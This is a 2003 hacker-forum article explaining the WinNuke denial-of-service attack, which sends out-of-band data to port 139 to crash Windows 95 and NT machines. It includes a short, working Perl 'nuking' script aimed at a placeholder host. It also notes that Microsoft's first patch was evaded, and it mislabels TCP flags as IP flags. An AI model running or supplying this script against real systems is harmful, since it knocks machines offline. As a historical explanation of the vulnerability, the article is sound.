Fromadia Network    | Rattlesnake | Offside | 4arthur | h4ckerx
-=Deaf=-
Back to the pavilion Discussion board About Us Want to post something?
REGISTER
nick:
pass:
 


 
Winnuke the technical side
# Networking    Aug 09 2003 - 06:33 EST    Posted By numberXIII

printer friendly page   Comment on this article -- there are 1 comments already  (1)
A technical explanation of the OOB packets vulnerablility behind the Winnuke program.

Winnuke is a DoS attack involving sending OOB packets (Out Of Band) to a Windows box. The attack consists of sending OOB packets on the netbios port(139) of that machine. The operating system not expecting that type of data will crash or freeze usually resulting in seeing the "Blue Screen Of Death" (BSOD). The main vulnerable systems are Windows 95 and Windows NT. A program was written to do all that and called Winnuke.


IP packets are used to send information on internet. They contain specific information about the sender, the receiver and the port to send the packet to. IP packets contain flags which give information on how the packets must be handled while going through routers or other systems. They come in 2 states: on (1 bit set at 1) or off (1 bit set at 0). IP flags include the following:

- SYN (synchronisation): establishes a new session
- ACK (Acknowledgment): assures the correct reception of a packet
- URGENT: indicates that a packet contains important information, like out of band data (OOB packets) (the packets used for this exploit)

Now to exploit the vulnerability all an attacker has to do is send out of band data through port 139 through a simple perl script. Must I remember you all that this script is onty for learning purposes and I won't take any responsibility for what you do with it. Nevertheless here is a simple "nuking" perl script:

#!/usr/bin/perl
use IO::Socket;
IO::Socket::INET
->new(PeerAddr=>"some_vulnerable_host.com:139")
->send("nuke with this message", MSG_OOB);


A (short term) solution was found by Microsoft and added to a patch for Windows NT. The only bad thing about this patch was his range for it only blocked nukes from the original winnuke program. What the patch did was filter the packets going through port 139 with the message "nuke me" in it (it was the message send out of band in the first version of the program). So when it was released a new version of winnuke was also released , a version where the attacker could choose the text to nuke with!

XIII
numberXIII@Phreaker.net



printer friendly page   Comment on this article -- there are 1 comments already  (1)

To the best of our knowledge, the text on this page either may be freely reproduced and distributed or was written specifically for fromadia.com. The site layout, page layout, and all original artwork on this site are Copyright © 2002 Fromadia.com. If you wish to reproduce any of it or if you are author of a work that you feel shouldn't be printed here, please email us at copyright@fromadia.com.

 


Enter a keyword...
sponsored links

web hosting
Reseller Hosting

The content and design of this site is © 2002 by Fromadia.com and any of the people that help support our community.

Lightning Servers - Reseller Hosting Experts | Lightning Servers Cpanel Hosting | Hosting Knowledge Base | Reseller Works | Web Design | Miserable Failure